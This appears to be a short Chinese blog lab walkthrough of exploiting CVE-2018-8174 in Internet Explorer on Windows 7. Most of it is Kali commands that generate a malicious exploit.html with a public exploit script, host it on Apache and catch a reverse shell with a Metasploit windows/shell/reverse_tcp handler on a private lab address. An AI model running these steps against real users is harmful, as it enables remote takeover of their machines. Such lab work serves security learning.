利用 0DAY 漏洞 CVE-2018-8174 获取 shell

利用 0DAY 漏洞 CVE-2018-8174 获取 shell

1、安装 CVE-2018-8174_EXP

从 github 上克隆 CVE-2018-8174 的 EXP 到 Kali

https://github.com/Yt1g3r/CVE-2018-8174_EXP

2、生成恶意 html 文件

root@ kali:~# cd CVE-2018-8174_EXP/

root@ kali:~/CVE-2018-8174_EXP# ls

CVE-2018-8174.py README.md

root@ kali:~/CVE-2018-8174_EXP# python CVE-2018-8174.py -u

http://192.168.185.252/exploit.html -o hack.rtf -i 192.168.185.252 -p 4444

恶意 html 文件生成成功:

3、将恶意 html 文件移动到网站根目录

root@ kali:~/CVE-2018-8174_EXP# cp exploit.html /var/www/html/

启动 apache2 服务

root@ kali:~/CVE-2018-8174_EXP# service apache2 start

新打开一个终端 CTRL+SHIFT+T,生成 MSF 监听

root@ kali:~# msfconsole

msf6 > use exploit/multi/handler

msf6 exploit(multi/handler) > set payload windows/shell/reverse_tcp

msf6 exploit(multi/handler) > set LHOST 192.168.185.252

msf6 exploit(multi/handler) > set LPORT 4444

msf6 exploit(multi/handler) > run

受害者点击恶意链接

进入 win7,打开 IE 浏览器或是 IE 内核的浏览器,比如 360 浏览器,访问恶意链接

http://192.168.185.252/exploit.html

返回 kali 查看已经建立会话

posted @ 2025-07-16 15:11  长温不喜风云  阅读(14)  评论(0)    收藏  举报